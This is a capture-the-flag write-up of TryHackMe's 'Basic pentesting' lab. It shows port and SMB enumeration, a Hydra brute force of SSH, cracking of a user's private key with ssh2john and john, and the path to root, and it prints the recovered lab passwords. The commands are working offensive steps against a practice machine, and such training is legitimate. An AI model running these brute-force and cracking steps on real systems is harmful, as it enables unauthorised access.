# Basic pentesting

Very basic CTF room from [tryHackMe](https://tryhackme.com/room/basicpentestingjt). I have enjoyed the privilege escalation part. Brute forcing is the key point of exploitation here. Hope this write-up will help you to explore.

My target IP changed later, because I had to restart the machine.

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMqt_bH-F09P1VEGGZ%2F-MbMqwow8xVRxzLfOitz%2Ffavicon.png?alt=media\&token=5cd88760-9842-4603-8767-875886c81848)

### Enumeration

1\) First, a masscan all port scan: **`masscan -e eth0 -p 1-65535 -v --rate=10000 10.10.1.239`**

```
Discovered open port 22/tcp on 10.10.1.239                                     
Discovered open port 139/tcp on 10.10.1.239                                    
Discovered open port 8009/tcp on 10.10.1.239                                   
Discovered open port 8080/tcp on 10.10.1.239                                   
Discovered open port 80/tcp on 10.10.1.239                                     
Discovered open port 445/tcp on 10.10.1.239 
```

2\) Now doing specific port scan to know more. Using nmap scan: **`nmap -sV -sC -p 22,139,8009,8080,80,445 -v 10.10.1.239`**

```
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.7

Host script results:
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BASIC2<00>           Flags: <unique><active>
|   BASIC2<03>           Flags: <unique><active>
|   BASIC2<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2021-06-04T09:50:56-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-04 14:50:56
|_  start_date: 1600-12-31 23:58:45
```

3\) enum4linux is a very good tool and I'm using to enumerate further. And it showed me some more info: **`enum4linux -a -v 10.10.1.239`**

```
Sharename       Type      Comment
---------       ----      -------
	Anonymous       Disk      
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
	
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
```

Here this server is vulnerable: [exploit-db](https://www.exploit-db.com/exploits/42084)&#x20;

4\) Enumerating webpage at port 80&#x20;

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMOTqEawBLu_G8jUhZ%2F-MbMRh9707YbMuq0Qqq2%2Fimage.png?alt=media\&token=7e3b6ade-035a-42eb-998c-fb21ad115300)

5\) As there is a web service, I initiate a Nikto scan: **`nikto -h`** [**`http://10.10.254.163`**](http://10.10.254.163)

```
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
```

6\) The interesting directory, **/development** gives two **.txt** file.&#x20;

* dev.txt says, maybe there is REST running and google says, it has vulnerability: [exploit-db](https://www.exploit-db.com/exploits/42627)
* j.txt says, weak password. Maybe I can brute force the password.

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMS3FITSACqmxASHL6%2F-MbMT-O3HFstVa5tsv56%2Fimage.png?alt=media\&token=16f4f597-cc8c-470e-b46e-5dc4d2cd07b1)

### Exploitation

7\) I was clueless which service to attack. As there are 2 different service vulnerable. I have tried to explore the ssh and used - Hydra to attack ssh: **`hydra -l jan -P rockyou.txt ssh://10.10.254.163`**

Found the password: **armando**

8\) Accessing the machine using ssh: **`ssh jan@10.10.254.163`**

### Privilege Escalation

9\) Enumeration says, only **/etc/passwd** has read permission. So this is not vulnerable.

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMda5SJaJ8P5WHS2IQ%2F-MbMfbjri43HOxZddbM4%2F1.png?alt=media\&token=0e96c817-7994-44d5-9632-331d934f8a39)

10\) Simple directory navigation show **.ssh** and private key for kay

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMda5SJaJ8P5WHS2IQ%2F-MbMhkO48dOU5kImkaI2%2F2.png?alt=media\&token=2b636c44-5737-4b31-b666-8cdc4ef0f0ae)

11\) Copied the id\_rsa, saved it using nano and then tried to use the private key. But can not log in just by the private key

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMda5SJaJ8P5WHS2IQ%2F-MbMhxz9ilCthKtfm7nL%2F3.png?alt=media\&token=ebabe0e2-770e-4239-a611-3678efef7dc8)

12\) So I need to find the hash, so using ssh2john: **`ssh2john.py id_rsa > rsa_hash`**

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMi2rC0Wf5OiAJaL8d%2F-MbMkd80nji-SgBKBKlh%2Fimage.png?alt=media\&token=65bdd985-d00f-4c3e-922e-0d3e2e1ec19e)

13\) Need to crack the password again:**`john --wordlist=rockyou.txt rsa_hash`**

Password:  **beeswax**

14\) Doing ssh again with the password: **`ssh -i id_rsa kay@10.10.254.163`**

15\) Now I have found a backup with a password hash. I can simply get the root access with the password.

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMlPYOpF-rI0LfTSo4%2F-MbMmEACxqenX9oSqU6Y%2Fimage.png?alt=media\&token=13a671e9-ac98-4ae2-95e0-7adaee116275)

Finally, the root shell !!

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMlPYOpF-rI0LfTSo4%2F-MbMmwPKMM-GMj4EIvaF%2F4.png?alt=media\&token=228748ab-bf68-40de-8eb5-880071114e8b)

### Answers

![](https://2384168284-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXQhX6_v4jPczvvgprg%2F-MbMn-1VtAKAiFlS8Cki%2F-MbMpeS-MwBkybXjtrU2%2F5.png?alt=media\&token=f3d2ee0e-3589-4471-a4e4-65d67cad547d)